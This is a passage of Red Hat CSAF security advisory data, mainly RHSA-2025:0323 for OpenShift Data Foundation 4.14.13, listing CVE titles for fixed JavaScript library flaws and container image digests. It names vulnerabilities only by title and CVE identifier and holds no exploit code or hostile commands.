"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
RHSA-2025:0323
Vulnerability from csaf_redhat - Published: 2025-01-15 01:19 - Updated: 2025-11-25 15:47Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.14.13 Bug Fix Update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.14.13 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an S3-compatible API.
Security Fix(es) from Bugzilla:
* tough-cookie: prototype pollution in cookie memstore (CVE-2023-26136)
* css-tools: Improper Input Validation causes Denial of Service via Regular Expression (CVE-2023-26364)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.14.13 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an S3-compatible API.\n\nSecurity Fix(es) from Bugzilla:\n\n* tough-cookie: prototype pollution in cookie memstore (CVE-2023-26136)\n\n* css-tools: Improper Input Validation causes Denial of Service via Regular Expression (CVE-2023-26364)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:0323",
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "DFBUGS-923",
"url": "https://issues.redhat.com/browse/DFBUGS-923"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_0323.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.14.13 Bug Fix Update",
"tracking": {
"current_release_date": "2025-11-25T15:47:43+00:00",
"generator": {
"date": "2025-11-25T15:47:43+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2025:0323",
"initial_release_date": "2025-01-15T01:19:29+00:00",
"revision_history": [
{
"date": "2025-01-15T01:19:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-01-15T01:19:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-25T15:47:43+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.14 for RHEL 9",
"product": {
"name": "RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.14::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"product": {
"name": "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"product_id": "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-cli-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.14.13-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"product": {
"name": "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"product_id": "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-cli-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"product_identification_helper": {
